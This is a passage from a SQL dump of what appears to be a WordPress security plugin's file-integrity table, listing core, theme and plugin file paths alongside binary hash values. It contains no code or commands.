�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:,�\'��:l�e����','h�B	Z����tUxW(b�\"�S���+��6\0X@�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;�wBwH��3Vo!��','�0��ͩf#���?����:�\0\\O����e�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�m	��ἦ���e','���$��_X��oZ\'�&�\n5��5ԧv','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������\n|=�}','�ӄ=�gHt]{كL�]�_^�.ˌ��i','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('�� ǰ-�*:����','wp-content/themes/magazine-hoot/css/jetpack.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m��q�\r.��+��o','F��\"��6��2���;mS���T��06Sh','',0,'?'),('&	AVl4���=�','wp-content/themes/magazine-hoot/include/admin/images/3-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ry����}����-6','��=y�v�#�J�Ig�>“��7c�','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),(';��o[=�g�˯Jf�','wp-content/themes/magazine-hoot/include/attr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L���0Wt�/��','�����&�K�FK~Z�`�Q�[���Ձ/���A','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�o��\0X#�83�~','��$�>���\n\ZW��)O��\0����(\n�ݮ�\08','',0,'?'),('���#����	>�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�W@gU�_4����','�\r��I&���ċ�9wƙ攢�J�_G�','',0,'?'),('�b`H�[1�H��W','wp-content/themes/magazine-hoot/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v���EY�r1u�','X���{���2N�#�_�Ka_g�2�f','',0,'?'),('�&�	A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nt�|�\'3�� 0���','\rL�G��6���q	��\\�-���P�I���','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<��	Ǖ�-W�t��]��<�s���u�','',0,'?'),('��\'�pR�� �O','wp-content/themes/magazine-hoot/widget/cta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0+���N��u.�o�','�Z�/p���t\\r[}�+�Ȍ��ӕ�O+<t','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W��	�v_�#�� f��~��R�>','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3ܧ_����Z�#�t','�V5�Rj:Z��.���\n5� ��_�3�O�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���{�����&ij��','ڙ��ڢ��D��W����\rэ��3�U��','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�\'I5��xN�$��','�m����<��	p�(t)P7��r�~^��闦��','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�12�;�j�4�F|','ȾLg7���ԠB�$Ru�H�������io��','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�:	��\r�j','����Z5L�ѾR��9���	`C���)�M','',0,'?'),('TjW���Hz�:8�q','wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���CD����~','m�U\r�\"�#1�P9�I�\Z���.���A�9�_�','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�j�����\Z','��D���8>�̓��hv�!׭�5�y�1��','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��@�Q�zGz�H','\"e�5�����-��fh�b?#r��=�a�v͠�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�@~vȃ���A','JvQܢZ�f��ґ3���(8tЇa�KC�@�e�','',0,'?'),('�/�V�	X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('	QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),('	?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('	,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('	7�������f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m	�8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),('	J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('	P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('	X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]t\r;��B�� ��]�','����\r �?���\"��hz�3��L�W�q�5�\"','',0,'?'),('	�h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>��`،�@�8�','p�J^_��Wm�kN_���b�vc\n�����!cU�','',0,'?'),('	�.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('	�l�q�1T��i��','wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�@*�D/�\\�I�','��X�m�W����M����K�t�V8Ɗ�','',0,'?'),('	Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���~9�(��-{�','G�U_�N_xC�`ѳf)�r����s��\Z�\n','',0,'?'),('	�9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('	�)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),('	��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),('	����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��p ���TcP\"','4����Z�@�\'x�ȬV��gR��l�\r�%','',0,'?'),('	�/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('	��i�AT�Hd��*��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��1z؛d��L','�8�x��\Z݁�[D����A��W/O�wĪ�','',0,'?'),('\n%2F�0��h\"�Ha��','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f	o��I1Z�N}v�-','̈́q}�0N�PvQ�&k����T�@/`v�','',0,'?'),('\n{X%N8Ÿw�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n��dt��0�*]{�','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q��!��� ����-','NN�Y�\'���_���3	���,�X�,냾','',0,'?'),('\n�Oe�lg�n�3\"��6�','wp-content/themes/twentynineteen/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~*2W�p	�d�','v\\$�YTp�>*�V�&Q���=��^ÍC{ExX','',0,'?'),('\n�!^�划����T\n�','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5vElT��ͤ���Q5','W�F����:ڮU��3���dm�0��	���','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!޶��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&�0G�����Q��ʚ','�gJRb��\0tf�2Å�&��0u�jYH�i��','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ϳ�FY�� p*','~!Z���7��/���<��3�Y�,�=Zk(','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('/�6�t�ޢ�+N�\0�s','wp-content/themes/magazine-hoot/include/admin/images/pageheader-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���XPF�8�‹�Q�','ю!���pe�/��#��Z7G6.t;V�ͣ�:�','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('}spK�� ��:�','wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY�]�Z�.^<��&Un','�G�,|�8������i1��<2�,�8��+w','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('�^u�_�4Y��MZ�','wp-content/themes/magazine-hoot/include/admin/images/2-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$J�\0�I-��R�`','�A�)u:��\np6�8�Ø��h5��P\r���','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy�	m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q	,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D	��dԢ���)�*k���,8Dˬ','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g^�C>��uJ�>�\Z','�V.��/�SV��9:_I:aldt�p���aue','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('\\j��\ZB�Rؿ�','wp-content/themes/magazine-hoot/hybrid/extend/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��y\nS��,�β\n','�W.�B�\nQi��fr��c�B$] a�Xm��','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('�)&�M2�D�\rY�U^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�����8v��w5ǿ','����Vs��y�f(����G�8�hM����\Z�j��','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_j]������RW','DŽܜ�6�\\���@���]ؿ��(��9�N	c','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꁥ�قH6K�&�x7��','-p� C��5s����5��s\"�^�C�����8','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iߞ=�%\\�����p�L4','\'й�1��]��uYїv�l�0���H�\\����','',0,'?'),('\rm���r��>������','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q{J=�bE,O����d','�*�xw��;�F�\'Ŋ��H�5�m�\'s�DQ','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v�	h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M嬬�S�Ի�JP��','��H����焑;���#�O����/t��','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�d���uQ�n�k','wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<2Q�.�%�|=�S�','$�?2���sȉ�F�G?TC?EkB��f� ��S�','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�=Z��-�!?q#3�','�J墥��O������b�*�:e�š�P�','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\0�[|��}��袄D�','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�@K����7�','����7y�^-��\'���<^?b�L���i=x�','',0,'?'),('���tN�0n$�يr','wp-content/themes/magazine-hoot/hybrid/inc/functions-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kc��\"�=%�A','}� 